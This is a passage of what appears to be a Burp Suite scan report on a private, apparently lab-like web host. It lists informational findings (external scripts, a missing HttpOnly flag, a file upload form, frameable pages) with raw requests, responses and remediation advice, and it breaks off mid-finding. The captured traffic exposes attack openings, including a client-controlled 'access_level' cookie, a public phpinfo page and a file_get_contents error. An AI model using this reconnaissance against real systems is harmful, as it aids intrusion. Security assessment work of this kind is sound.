If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. Applications that rely on third-party scripts should consider copying the contents of these scripts onto their own domain and including them from there. If that is not possible (e.g. for licensing reasons) then consider reimplementing the script's functionality within application code.



3.6.1. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/css/sb-admin-2.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.2. http://10.250.200.5:8080/admin-networking.html
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-networking.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-networking.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6553
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:19 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.3. http://10.250.200.5:8080/admin-system.html
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-system.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-system.html HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5039
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.6.4. http://10.250.200.5:8080/admin-users.html
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /admin-users.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request 1

GET /admin-users.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5624
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.7. Cookie without HttpOnly flag set
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

References

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
3.8. File upload functionality
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

References

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
<td>
                       <input type="file" name="picture" />
                   </td>
...[SNIP]...
3.9. Frameable response (potential Clickjacking)
Previous  Next

There are 28 instances of this issue:

Issue description

If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.

Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.

You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.

Issue remediation

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.

References



3.9.1. http://10.250.200.5/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:48 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Content-Length: 9520
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11
...[SNIP]...
3.9.2. http://10.250.200.5/search/555-555-0199@example.com/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /search/555-555-0199@example.com/

Request 1

GET /search/555-555-0199@example.com/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9850

<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11
...[SNIP]...
3.9.3. http://10.250.200.5:81/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 8273
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.4. http://10.250.200.5:81/contactus.php
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /contactus.php

Request 1

GET /contactus.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1761
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: f in <b>/var/www/html/contactus.php</b> on line <b>7</b><br />
<br />
<b>Warning</b>: file_get_contents(): Filename cannot be empty in <b>/var/www/html/contact
...[SNIP]...
3.9.5. http://10.250.200.5:81/login
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
3.9.6. http://10.250.200.5:81/phpinfo.php
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.9.7. http://10.250.200.5:81/phpinfo.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.9.8. http://10.250.200.5:81/register
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /register

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
3.9.9. http://10.250.200.5:81/search
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Request 1

GET /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:29 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.10. http://10.250.200.5:81/search/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/

Request 1

GET /search/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.11. http://10.250.200.5:81/search/search
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/search

Request 1

GET /search/search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.12. http://10.250.200.5:81/sys2_test.php
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Request 1

GET /sys2_test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:13 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.13. http://10.250.200.5:81/sys2_test.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys2_test.php/

Request 1

GET /sys2_test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.14. http://10.250.200.5:81/user/jyoti.ermine
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Request 1

GET /user/jyoti.ermine HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.15. http://10.250.200.5:81/user/jyoti.ermine/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Request 1

GET /user/jyoti.ermine/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
